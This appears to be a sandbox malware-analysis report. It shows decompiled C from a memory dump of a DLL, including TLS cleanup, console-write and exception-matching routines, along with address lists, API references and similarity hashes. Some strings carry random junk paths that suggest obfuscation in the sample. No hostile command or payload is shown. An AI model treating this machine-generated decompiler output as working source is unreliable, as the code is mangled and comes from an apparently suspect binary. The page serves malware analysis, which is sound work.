0x00000000
0x6ed2f9ed
0x6ed2f9c3
0x6ed2f9c6
0x6ed2f9c9
0x6ed2f9cb
0x00000000
0x6ed2f9cd
0x6ed2f9cd
0x6ed2f9d1
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed2f9d1
0x6ed2f9cb
0x6ed2f9c1
0x6ed2f86b
0x6ed2f86b
0x6ed2f872
0x00000000
0x6ed2f874
0x6ed2f874
0x6ed2f87b
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed2f87b
0x6ed2f872
0x6ed2f869
0x6ed2f85c
0x6ed2f7dc
0x6ed2f7e4
0x6ed2f7e7
0x6ed2f7ec
0x6ed2f7f0
0x6ed2f7f3
0x6ed2f7f9
0x6ed2f7fc
0x00000000
0x6ed2f7fe
0x6ed2f7fe
0x6ed2f801
0x6ed2f803
0x6ed2fa39
0x6ed2fa39
0x00000000
0x6ed2f809
0x6ed2f811
0x6ed2f81c
0x00000000
0x00000000
0x6ed2f825
0x6ed2f828
0x6ed2f829
0x6ed2f82c
0x6ed2f82e
0x00000000
0x6ed2f834
0x00000000
0x6ed2f834
0x00000000
0x6ed2f82e
0x6ed2f809
0x6ed2fa3e
0x6ed2fa3e
0x6ed2fa40
0x6ed2fa41
0x6ed2fa48
0x6ed2fa4b
0x6ed2fa59
0x6ed2fa5e
0x6ed2fa63
0x6ed2fa66
0x6ed2fa6b
0x6ed2fa6e
0x6ed2fa71
0x6ed2fa73
0x6ed2fa75
0x6ed2fa75
0x6ed2fa7a
0x6ed2fa86
0x6ed2fa8c
0x6ed2fa91
0x6ed2fa94
0x6ed2fa95
0x00000000
0x6ed2fa95
0x6ed2f7fc
0x6ed2f7da
0x6ed2f79a
0x6ed2f77b
0x6ed2f76d
0x6ed2f739

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6ED2F7F3
type_info::operator==.LIBVCRUNTIME ref: 6ED2F815
___TypeMatch.LIBVCRUNTIME ref: 6ED2F924
IsInExceptionSpec.LIBVCRUNTIME ref: 6ED2F9F6
_UnwindNestedFrames.LIBCMT ref: 6ED2FA7A
CallUnexpected.LIBVCRUNTIME ref: 6ED2FA95

Strings

csm, xrefs: 6ED2F84C
csm, xrefs: 6ED2F7A0
csm, xrefs: 6ED2F733

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 452b0b57024fef1c979feb8dab75c3aa104cc9be4146e19e714935eee15e7260
Instruction ID: 09c797852dffd51fb991c30dbfa49756d3e9c5d5c7e4c27bf76e81a2a30e1fb0
Opcode Fuzzy Hash: 452b0b57024fef1c979feb8dab75c3aa104cc9be4146e19e714935eee15e7260
Instruction Fuzzy Hash: 78B15A71C0420AEFDF15CFE4C89099EB7B9FF08318B24496AEA157B215D731DA52CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C340, Relevance: 12.6, APIs: 10, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6ED1C340() {
				intOrPtr _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				signed char _t42;
				signed char _t43;
				signed char _t44;
				signed char _t45;
				intOrPtr* _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr* _t55;
				intOrPtr* _t56;
				void* _t57;

				_t25 =  *((intOrPtr*)(_t57 + 0x18));
				if(_t25 == 3 || _t25 == 0) {
					_t52 =  *0x6ed6e12c; // 0x0
					if(_t52 == 0) {
						goto L26;
					}
					_t42 = 0;
					do {
						_t27 = TlsGetValue( *(_t52 + 4));
						if(_t27 != 0) {
							TlsSetValue( *(_t52 + 4), 0);
							 *_t52(_t27);
							_t57 = _t57 + 4;
							_t42 = 1;
						}
						_t52 =  *((intOrPtr*)(_t52 + 8));
					} while (_t52 != 0);
					if((_t42 & 0x00000001) == 0) {
						goto L26;
					}
					_t53 =  *0x6ed6e12c; // 0x0
					if(_t53 == 0) {
						goto L26;
					}
					_t43 = 0;
					do {
						_t28 = TlsGetValue( *(_t53 + 4));
						if(_t28 != 0) {
							TlsSetValue( *(_t53 + 4), 0);
							 *_t53(_t28);
							_t57 = _t57 + 4;
							_t43 = 1;
						}
						_t53 =  *((intOrPtr*)(_t53 + 8));
					} while (_t53 != 0);
					if((_t43 & 0x00000001) == 0) {
						goto L26;
					}
					_t54 =  *0x6ed6e12c; // 0x0
					if(_t54 == 0) {
						goto L26;
					}
					_t44 = 0;
					do {
						_t29 = TlsGetValue( *(_t54 + 4));
						if(_t29 != 0) {
							TlsSetValue( *(_t54 + 4), 0);
							 *_t54(_t29);
							_t57 = _t57 + 4;
							_t44 = 1;
						}
						_t54 =  *((intOrPtr*)(_t54 + 8));
					} while (_t54 != 0);
					if((_t44 & 0x00000001) == 0) {
						goto L26;
					}
					_t55 =  *0x6ed6e12c; // 0x0
					if(_t55 == 0) {
						goto L26;
					}
					_t45 = 0;
					do {
						_t30 = TlsGetValue( *(_t55 + 4));
						if(_t30 != 0) {
							TlsSetValue( *(_t55 + 4), 0);
							 *_t55(_t30);
							_t57 = _t57 + 4;
							_t45 = 1;
						}
						_t55 =  *((intOrPtr*)(_t55 + 8));
					} while (_t55 != 0);
					if((_t45 & 0x00000001) != 0) {
						_t56 =  *0x6ed6e12c; // 0x0
						while(_t56 != 0) {
							_t31 = TlsGetValue( *(_t56 + 4));
							if(_t31 != 0) {
								TlsSetValue( *(_t56 + 4), 0);
								 *_t56(_t31);
								_t57 = _t57 + 4;
							}
							_t56 =  *((intOrPtr*)(_t56 + 8));
						}
					}
					goto L26;
				} else {
					L26:
					_t26 =  *0x6ed6a300; // 0x70
					return _t26;
				}
			}

0x6ed1c344
0x6ed1c34b
0x6ed1c355
0x6ed1c35d
0x00000000
0x00000000
0x6ed1c369
0x6ed1c377
0x6ed1c37a
0x6ed1c37e
0x6ed1c387
0x6ed1c38e
0x6ed1c391
0x6ed1c394
0x6ed1c394
0x6ed1c370
0x6ed1c373
0x6ed1c39b
0x00000000
0x00000000
0x6ed1c3a1
0x6ed1c3a9
0x00000000
0x00000000
0x6ed1c3af
0x6ed1c3c7
0x6ed1c3ca
0x6ed1c3ce
0x6ed1c3d7
0x6ed1c3de
0x6ed1c3e1
0x6ed1c3e4
0x6ed1c3e4
0x6ed1c3c0
0x6ed1c3c3
0x6ed1c3eb
0x00000000
0x00000000
0x6ed1c3f1
0x6ed1c3f9
0x00000000
0x00000000
0x6ed1c3fb
0x6ed1c407
0x6ed1c40a
0x6ed1c40e
0x6ed1c417
0x6ed1c41e
0x6ed1c421
0x6ed1c424
0x6ed1c424
0x6ed1c400
0x6ed1c403
0x6ed1c42b
0x00000000
0x00000000
0x6ed1c42d
0x6ed1c435
0x00000000
0x00000000
0x6ed1c437
0x6ed1c447
0x6ed1c44a
0x6ed1c44e
0x6ed1c457
0x6ed1c45e
0x6ed1c461
0x6ed1c464
0x6ed1c464
0x6ed1c440
0x6ed1c443
0x6ed1c46b
0x6ed1c479
0x6ed1c484
0x6ed1c48b
0x6ed1c48f
0x6ed1c498
0x6ed1c49f
0x6ed1c4a2
0x6ed1c4a2
0x6ed1c481
0x6ed1c481
0x6ed1c484
0x00000000
0x6ed1c46d
0x6ed1c46d
0x6ed1c46d
0x6ed1c476
0x6ed1c476

APIs

TlsGetValue.KERNEL32(?), ref: 6ED1C37A
TlsSetValue.KERNEL32(?,00000000), ref: 6ED1C387
TlsGetValue.KERNEL32(?), ref: 6ED1C3CA
TlsSetValue.KERNEL32(?,00000000), ref: 6ED1C3D7
TlsGetValue.KERNEL32(?), ref: 6ED1C40A
TlsSetValue.KERNEL32(?,00000000), ref: 6ED1C417
TlsGetValue.KERNEL32(?), ref: 6ED1C44A
TlsSetValue.KERNEL32(?,00000000), ref: 6ED1C457
TlsGetValue.KERNEL32(?), ref: 6ED1C48B
TlsSetValue.KERNEL32(?,00000000), ref: 6ED1C498

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: b6bbe5526e8e211aab4c795bc8c519bbcc28d6acbc4c1a2640cecca2950e30bf
Instruction ID: 978c05338a853e997eb6b23d14e612d34d565cf08f375223ad0d35ac4b3bd81a
Opcode Fuzzy Hash: b6bbe5526e8e211aab4c795bc8c519bbcc28d6acbc4c1a2640cecca2950e30bf
Instruction Fuzzy Hash: D3418E3124C259EFEB54AFE4FC15BEA3724AF13B40F044034EE644E155E761EA61EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ED21BF0, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 212
fileCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E6ED21BF0(void* __ebx, struct _OVERLAPPED** __ecx, void* __edx, void* __edi, void* __ebp, signed char _a4, signed char* _a8) {
				char _v20;
				void* _v24;
				char _v44;
				long _v48;
				void* _v52;
				signed int _v56;
				char _v60;
				void* __esi;
				long _t57;
				void* _t58;
				long _t60;
				signed int _t61;
				long _t81;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				char _t93;
				void* _t96;
				void* _t97;
				signed int _t100;
				signed int _t101;
				struct _OVERLAPPED* _t102;
				signed int _t105;
				signed int* _t106;
				signed int _t110;
				signed char _t112;
				void* _t114;
				long _t118;
				void** _t119;
				void* _t120;
				long _t122;
				void* _t125;
				void* _t133;
				struct _OVERLAPPED** _t135;
				void* _t144;
				long _t152;
				signed char* _t155;
				DWORD* _t156;
				void* _t157;
				void** _t158;
				void** _t160;

				_push(__ebp);
				_push(__ebx);
				_push(__edi);
				_t158 = _t157 - 0x30;
				_t152 = _a4;
				_t135 = __ecx;
				if(_t152 == 0) {
					 *(__ecx + 4) = 0;
					goto L5;
				} else {
					_t96 = __edx;
					_t58 = GetStdHandle(0xfffffff4);
					if(_t58 == 0) {
						_t57 = 6;
						goto L7;
					} else {
						_t133 = _t58;
						if(_t58 != 0xffffffff) {
							_v48 = 0;
							_t60 = GetConsoleMode(_t133,  &_v48);
							__eflags = _t60;
							if(_t60 == 0) {
								__eflags = _t133;
								if(__eflags == 0) {
									goto L42;
								} else {
									_v48 = 0;
									_t81 = WriteFile(_t133, _t96, _t152,  &_v48, 0);
									__eflags = _t81;
									if(_t81 == 0) {
										_t57 = GetLastError();
										_t102 = 0;
										__eflags = 0;
										_t122 = 1;
									} else {
										_t102 = _v48;
										_t57 = 0;
										_t122 = 0;
									}
									 *_t135 = _t122;
									_t135[1] = _t102;
									_t135[2] = _t57;
									goto L9;
								}
							} else {
								_t57 = _a8[4] & 0x000000ff;
								__eflags = _t57;
								if(_t57 == 0) {
									__eflags = _t152 - 0x1000;
									_t84 =  <  ? _t152 : 0x1000;
									_push( <  ? _t152 : 0x1000);
									E6ED13650( &_v60, _t96);
									_t158 =  &(_t158[1]);
									__eflags = _v60 - 1;
									if(_v60 != 1) {
										_t86 = _v56;
										_t97 = _v52;
										goto L28;
									} else {
										__eflags = _v56;
										if(_v56 == 0) {
											_t87 =  *_t96 & 0x000000ff;
											_t38 = _t87 + 0x6ed5f570; // 0x1010101
											_t105 =  *_t38 & 0x000000ff;
											__eflags = _t105 - 2;
											if(_t105 < 2) {
												L39:
												_t135[2] = 0x6ed608cc;
												_t135[1] = 0x1502;
												goto L40;
											} else {
												__eflags = _t105 - _t152;
												if(_t105 <= _t152) {
													goto L39;
												} else {
													_t106 = _a8;
													 *_t106 = _t87;
													_t106[1] = 1;
													goto L38;
												}
											}
											goto L9;
										} else {
											_t88 = _v56;
											__eflags = _t88 - _t152;
											if(__eflags > 0) {
												_t100 = _t88;
												_t118 = _t152;
												_push(0x6ed60904);
												goto L45;
											} else {
												_t125 = _t96;
												_push(_t88);
												E6ED13650( &_v48, _t125);
												_t158 =  &(_t158[1]);
												_t86 = L6ED22730(_t96,  &_v48, _t133, _t135);
												_t97 = _t125;
												L28:
												_push(_t97);
												_push(_t86);
												_t57 = L6ED22470(_t97, _t135, _t133, _t133, _t135);
												_t158 =  &(_t158[2]);
												goto L9;
											}
										}
									}
								} else {
									__eflags = _t57 - 4;
									if(_t57 >= 4) {
										E6ED399A0("Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx", 0x3a, 0x6ed6086c);
										_t158 =  &(_t158[1]);
										asm("ud2");
										L42:
										_t61 = E6ED394E0(_t96,  &M6ED5FBBA, 0x23, _t133, _t135, __eflags, 0x6ed5fc64);
										_t158 =  &(_t158[1]);
										asm("ud2");
										goto L43;
									} else {
										_t110 =  *_t96;
										_t155 = _a8;
										__eflags = (_t110 & 0x000000c0) - 0x80;
										if((_t110 & 0x000000c0) != 0x80) {
											_a4 = 0;
											goto L24;
										} else {
											_t155[_t57] = _t110;
											_t112 = _a4 + 1;
											_a4 = _t112;
											_t57 =  *_t155 & 0x000000ff;
											_t96 =  *(_t57 + 0x6ed5f570) & 0x000000ff;
											__eflags = _t96 - _t112;
											_v24 = _t96;
											if(_t96 <= _t112) {
												_t61 = _t112 & 0x000000ff;
												__eflags = _t112 - 5;
												if(__eflags >= 0) {
													L43:
													_t100 = _t61;
													_t118 = 4;
													_push(0x6ed608d4);
													L45:
													E6ED39470(_t96, _t100, _t118, _t133, _t135, __eflags);
													_t160 =  &(_t158[1]);
													asm("ud2");
													goto L46;
												} else {
													_push(_t61);
													_t57 = E6ED13650( &_v60, _t155);
													_t158 =  &(_t158[1]);
													__eflags = _v60 - 1;
													_a4 = 0;
													if(_v60 == 1) {
														L24:
														_t135[2] = 0x6ed608cc;
														_t135[1] = 0x1502;
														goto L8;
													} else {
														_t114 = _v52;
														_t91 = _v56;
														__eflags = _t114 - _t96;
														 *_t158 = _t114;
														if(_t114 != _t96) {
															L46:
															_t101 =  &_v24;
															_t119 = _t160;
															_v48 = 0;
															_push(0x6ed608e4);
															_push( &_v48);
															goto L48;
														} else {
															_t156 =  &_v48;
															_push(_t96);
															_push(_t91);
															L6ED22470(_t96, _t156, _t133, _t133, _t135);
															_t160 =  &(_t158[2]);
															__eflags = _v48 - 1;
															if(_v48 != 1) {
																_t93 = _v44;
																 *_t160 = _t96;
																__eflags = _t93 - _t96;
																_v20 = _t93;
																if(_t93 != _t96) {
																	_t101 =  &_v20;
																	_t119 = _t160;
																	_v48 = 0;
																	_push(0x6ed608f4);
																	_push(_t156);
																	L48:
																	E6ED39AB0(_t96, _t101, _t119, _t133);
																	asm("ud2");
																	L50();
																	_t120 = _t135;
																	__eflags = _t101 - 0x46a;
																	if(_t101 > 0x46a) {
																		__eflags = _t101 - 0x271c;
																		if(_t101 <= 0x271c) {
																			__eflags = _t101 - 0x1715;
																			if(_t101 > 0x1715) {
																				__eflags = _t101 - 0x1f4d;
																				if(_t101 > 0x1f4d) {
																					__eflags = _t101 - 0x1f4e;
																					if(_t101 == 0x1f4e) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x2022;
																						if(_t101 == 0x2022) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x25e9;
																							if(_t101 != 0x25e9) {
																								goto L106;
																							} else {
																								goto L93;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x1716;
																					if(_t101 == 0x1716) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x1b64;
																						if(_t101 == 0x1b64) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x1b80;
																							if(_t101 == 0x1b80) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			} else {
																				__eflags = _t101 - 0x4cf;
																				if(_t101 > 0x4cf) {
																					__eflags = _t101 - 0x4d0;
																					if(_t101 == 0x4d0) {
																						return 4;
																					} else {
																						__eflags = _t101 - 0x50f;
																						if(_t101 == 0x50f) {
																							return 0x1a;
																						} else {
																							__eflags = _t101 - 0x5b4;
																							if(_t101 == 0x5b4) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x46b;
																					if(_t101 == 0x46b) {
																						return 0x1e;
																					} else {
																						__eflags = _t101 - 0x476;
																						if(_t101 == 0x476) {
																							return 0x20;
																						} else {
																							__eflags = _t101 - 0x4cf;
																							if(_t101 != 0x4cf) {
																								goto L106;
																							} else {
																								return 5;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t144 = _t101 - 0x271d;
																			__eflags = _t144 - 0x34;
																			if(_t144 <= 0x34) {
																				goto __edx;
																			}
																			__eflags = _t101 - 0x3c2a - 2;
																			if(_t101 - 0x3c2a < 2) {
																				goto L93;
																			} else {
																				__eflags = _t101 - 0x35ed;
																				if(_t101 == 0x35ed) {
																					goto L93;
																				} else {
																					goto L106;
																				}
																			}
																		}
																	} else {
																		__eflags = _t101 - 0xb6;
																		if(_t101 > 0xb6) {
																			__eflags = _t101 - 0x10a;
																			if(_t101 <= 0x10a) {
																				__eflags = _t101 - 0xde;
																				if(_t101 <= 0xde) {
																					__eflags = _t101 - 0xb7;
																					if(_t101 == 0xb7) {
																						return 0xc;
																					} else {
																						__eflags = _t101 - 0xce;
																						if(_t101 != 0xce) {
																							goto L106;
																						} else {
																							return 0x21;
																						}
																					}
																				} else {
																					__eflags = _t101 - 0xdf;
																					if(_t101 == 0xdf) {
																						return 0x1b;
																					} else {
																						__eflags = _t101 - 0xe8;
																						if(_t101 == 0xe8) {
																							return 0xb;
																						} else {
																							__eflags = _t101 - 0x102;
																							if(_t101 == 0x102) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			} else {
																				__eflags = _t101 - 0x3e2;
																				if(_t101 > 0x3e2) {
																					__eflags = _t101 - 0x3e3;
																					if(_t101 == 0x3e3) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x41d;
																						if(_t101 == 0x41d) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x461;
																							if(_t101 == 0x461) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x10b;
																					if(_t101 == 0x10b) {
																						return 0xe;
																					} else {
																						__eflags = _t101 - 0x150;
																						if(_t101 == 0x150) {
																							return 0xf;
																						} else {
																							__eflags = _t101 - 0x252;
																							if(_t101 == 0x252) {
																								L93:
																								return 0x16;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t101 = _t101 + 0xfffffffe;
																			__eflags = _t101 - 0xa8;
																			if(_t101 <= 0xa8) {
																				_t120 = _t120 +  *((intOrPtr*)(0x6ed220f8 + _t101 * 4));
																				goto __edx;
																			}
																			L106:
																			return 0x28;
																		}
																	}
																} else {
																	L38:
																	_t57 = 0;
																	_t135[1] = 1;
																	 *_t135 = 0;
																	goto L9;
																}
															} else {
																asm("movsd xmm0, [esp+0x14]");
																asm("movsd [esi+0x4], xmm0");
																L40:
																_t57 = 1;
																 *_t135 = 1;
																goto L9;
															}
														}
													}
												}
											} else {
												_t135[1] = 1;
												L5:
												 *_t135 = 0;
												goto L9;
											}
										}
									}
								}
							}
						} else {
							_t57 = GetLastError();
							L7:
							_t135[1] = 0;
							_t135[2] = _t57;
							L8:
							 *_t135 = 1;
							L9:
							return _t57;
						}
					}
				}
			}

0x6ed21bf0
0x6ed21bf1
0x6ed21bf2
0x6ed21bf4
0x6ed21bf7
0x6ed21bfb
0x6ed21bff
0x6ed21c1e
0x00000000
0x6ed21c01
0x6ed21c01
0x6ed21c05
0x6ed21c0d
0x6ed21c2d
0x00000000
0x6ed21c0f
0x6ed21c0f
0x6ed21c14
0x6ed21c4e
0x6ed21c58
0x6ed21c5e
0x6ed21c60
0x6ed21cb9
0x6ed21cbb
0x00000000
0x6ed21cc1
0x6ed21cc1
0x6ed21cd3
0x6ed21cd9
0x6ed21cdb
0x6ed21d55
0x6ed21d5b
0x6ed21d5b
0x6ed21d5d
0x6ed21cdd
0x6ed21cdd
0x6ed21ce1
0x6ed21ce3
0x6ed21ce3
0x6ed21d62
0x6ed21d64
0x6ed21d67
0x00000000
0x6ed21d67
0x6ed21c62
0x6ed21c66
0x6ed21c6a
0x6ed21c6c
0x6ed21ce7
0x6ed21cf8
0x6ed21cfb
0x6ed21cfc
0x6ed21d01
0x6ed21d04
0x6ed21d09
0x6ed21d6f
0x6ed21d73
0x00000000
0x6ed21d0b
0x6ed21d0b
0x6ed21d10
0x6ed21de9
0x6ed21dec
0x6ed21dec
0x6ed21df3
0x6ed21df6
0x6ed21e2b
0x6ed21e2b
0x6ed21e32
0x00000000
0x6ed21df8
0x6ed21df8
0x6ed21dfa
0x00000000
0x6ed21dfc
0x6ed21dfc
0x6ed21e00
0x6ed21e02
0x00000000
0x6ed21e02
0x6ed21dfa
0x00000000
0x6ed21d16
0x6ed21d16
0x6ed21d1a
0x6ed21d1c
0x6ed21e85
0x6ed21e87
0x6ed21e89
0x00000000
0x6ed21d22
0x6ed21d26
0x6ed21d2a
0x6ed21d2b
0x6ed21d30
0x6ed21d35
0x6ed21d3a
0x6ed21d77
0x6ed21d7b
0x6ed21d7c
0x6ed21d7d
0x6ed21d82
0x00000000
0x6ed21d82
0x6ed21d1c
0x6ed21d10
0x6ed21c6e
0x6ed21c6e
0x6ed21c70
0x6ed21e54
0x6ed21e59
0x6ed21e5c
0x6ed21e5e
0x6ed21e6d
0x6ed21e72
0x6ed21e75
0x00000000
0x6ed21c76
0x6ed21c76
0x6ed21c78
0x6ed21c81
0x6ed21c84
0x6ed21d3e
0x00000000
0x6ed21c8a
0x6ed21c8a
0x6ed21c91
0x6ed21c93
0x6ed21c96
0x6ed21c9a
0x6ed21ca1
0x6ed21ca3
0x6ed21ca7
0x6ed21d8a
0x6ed21d8d
0x6ed21d90
0x6ed21e77
0x6ed21e77
0x6ed21e79
0x6ed21e7e
0x6ed21e8e
0x6ed21e8e
0x6ed21e93
0x6ed21e96
0x00000000
0x6ed21d96
0x6ed21d9c
0x6ed21d9d
0x6ed21da2
0x6ed21da5
0x6ed21daa
0x6ed21dae
0x6ed21d42
0x6ed21d42
0x6ed21d49
0x00000000
0x6ed21db0
0x6ed21db0
0x6ed21db4
0x6ed21db8
0x6ed21dba
0x6ed21dbd
0x6ed21e98
0x6ed21e98
0x6ed21e9c
0x6ed21e9e
0x6ed21ea6
0x6ed21eaf
0x00000000
0x6ed21dc3
0x6ed21dc3
0x6ed21dcb
0x6ed21dcc
0x6ed21dcd
0x6ed21dd2
0x6ed21dd5
0x6ed21dda
0x6ed21e08
0x6ed21e0c
0x6ed21e0f
0x6ed21e11
0x6ed21e15
0x6ed21eb2
0x6ed21eb6
0x6ed21eb8
0x6ed21ec0
0x6ed21ec5
0x6ed21ec6
0x6ed21ec6
0x6ed21ece
0x6ed21ed1
0x6ed21ed6
0x6ed21ed9
0x6ed21edf
0x6ed21f05
0x6ed21f0b
0x6ed21f29
0x6ed21f2f
0x6ed21fa2
0x6ed21fa8
0x6ed2205e
0x6ed22064
0x00000000
0x6ed22066
0x6ed22066
0x6ed2206c
0x00000000
0x6ed2206e
0x6ed2206e
0x6ed22074
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed22074
0x6ed2206c
0x6ed21fae
0x6ed21fae
0x6ed21fb4
0x00000000
0x6ed21fba
0x6ed21fba
0x6ed21fc0
0x00000000
0x6ed21fc6
0x6ed21fc6
0x6ed21fcc
0x00000000
0x6ed21fd2
0x00000000
0x6ed21fd2
0x6ed21fcc
0x6ed21fc0
0x6ed21fb4
0x6ed21f31
0x6ed21f31
0x6ed21f37
0x6ed22020
0x6ed22026
0x6ed220a1
0x6ed22028
0x6ed22028
0x6ed2202e
0x6ed220f1
0x6ed22034
0x6ed22034
0x6ed2203a
0x00000000
0x6ed2203c
0x00000000
0x6ed2203c
0x6ed2203a
0x6ed2202e
0x6ed21f3d
0x6ed21f3d
0x6ed21f43
0x6ed220dd
0x6ed21f49
0x6ed21f49
0x6ed21f4f
0x6ed220e1
0x6ed21f55
0x6ed21f55
0x6ed21f5b
0x00000000
0x6ed21f61
0x6ed21f64
0x6ed21f64
0x6ed21f5b
0x6ed21f4f
0x6ed21f43
0x6ed21f37
0x6ed21f0d
0x6ed21f0d
0x6ed21f13
0x6ed21f16
0x6ed21f23
0x6ed21f23
0x6ed2200e
0x6ed22011
0x00000000
0x6ed22013
0x6ed22013
0x6ed22019
0x00000000
0x6ed2201b
0x00000000
0x6ed2201b
0x6ed22019
0x6ed22011
0x6ed21ee1
0x6ed21ee1
0x6ed21ee7
0x6ed21f65
0x6ed21f6b
0x6ed21fd7
0x6ed21fdd
0x6ed22082
0x6ed22088
0x6ed22099
0x6ed2208a
0x6ed2208a
0x6ed22090
0x00000000
0x6ed22092
0x6ed22095
0x6ed22095
0x6ed22090
0x6ed21fe3
0x6ed21fe3
0x6ed21fe9
0x6ed220ed
0x6ed21fef
0x6ed21fef
0x6ed21ff5
0x6ed2209d
0x6ed21ffb
0x6ed21ffb
0x6ed22001
0x00000000
0x6ed22003
0x00000000
0x6ed22003
0x6ed22001
0x6ed21ff5
0x6ed21fe9
0x6ed21f6d
0x6ed21f6d
0x6ed21f73
0x6ed22041
0x6ed22047
0x00000000
0x6ed22049
0x6ed22049
0x6ed2204f
0x00000000
0x6ed22051
0x6ed22051
0x6ed22057
0x00000000
0x6ed22059
0x00000000
0x6ed22059
0x6ed22057
0x6ed2204f
0x6ed21f79
0x6ed21f79
0x6ed21f7f
0x6ed220e5
0x6ed21f85
0x6ed21f85
0x6ed21f8b
0x6ed220e9
0x6ed21f91
0x6ed21f91
0x6ed21f97
0x6ed22076
0x6ed22079
0x6ed21f9d
0x00000000
0x6ed21f9d
0x6ed21f97
0x6ed21f8b
0x6ed21f7f
0x6ed21f73
0x6ed21ee9
0x6ed21ee9
0x6ed21eec
0x6ed21ef2
0x6ed21ef8
0x6ed21eff
0x6ed21eff
0x6ed220f2
0x6ed220f5
0x6ed220f5
0x6ed21ee7
0x6ed21e1b
0x6ed21e1b
0x6ed21e1b
0x6ed21e1d
0x6ed21e24
0x00000000
0x6ed21e24
0x6ed21ddc
0x6ed21ddc
0x6ed21de2
0x6ed21e39
0x6ed21e39
0x6ed21e3e
0x00000000
0x6ed21e3e
0x6ed21dda
0x6ed21dbd
0x6ed21dae
0x6ed21cad
0x6ed21cad
0x6ed21c25
0x6ed21c25
0x00000000
0x6ed21c25
0x6ed21ca7
0x6ed21c84
0x6ed21c70
0x6ed21c6c
0x6ed21c16
0x6ed21c16
0x6ed21c32
0x6ed21c32
0x6ed21c39
0x6ed21c3c
0x6ed21c3c
0x6ed21c42
0x6ed21c49
0x6ed21c49
0x6ed21c14
0x6ed21c0d

APIs

GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,?,?,?,6ED21A7E,?), ref: 6ED21C05
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,6ED21A7E,?), ref: 6ED21C16
GetConsoleMode.KERNEL32(00000000,?), ref: 6ED21C58
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6ED21CD3
GetLastError.KERNEL32(?,?,?,00000000), ref: 6ED21D55

Strings

Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx, xrefs: 6ED21E45
assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb, xrefs: 6ED21E5E

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$ConsoleFileHandleModeWrite
